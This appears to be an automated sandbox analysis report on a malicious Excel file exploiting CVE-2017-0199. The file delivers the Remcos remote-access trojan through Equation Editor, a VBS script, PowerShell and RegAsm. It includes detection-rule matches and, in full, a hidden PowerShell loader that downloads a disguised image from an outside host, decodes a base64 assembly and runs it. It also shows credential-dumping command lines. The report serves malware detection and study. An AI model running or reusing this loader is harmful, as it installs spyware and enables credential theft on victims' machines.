Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3308, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: bhvA42C.tmp.15.dr | Binary or memory string: org.slneighbors
Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@10/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,15_2_004182CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_0041798D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,15_2_00418758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,14_2_0040F4AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,14_2_0041B539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AADB
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-4CT19T
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7712.tmp
Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | OLE indicator, Workbook stream: true
Source: F9430000.0.dr | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................T.r.u.e.(.P.............................yk.........................s..............#...............#.............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ....................................u.e.(.P..............................k.........................s..............#.............H...............
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.455705114.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx | ReversingLabs: Detection: 18%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
                  Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[garbled encoded payload omitted]'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\drnnovqcfns"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nttgonbetvkaco"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: propsys.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ntmarta.dll
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: shcore.dll
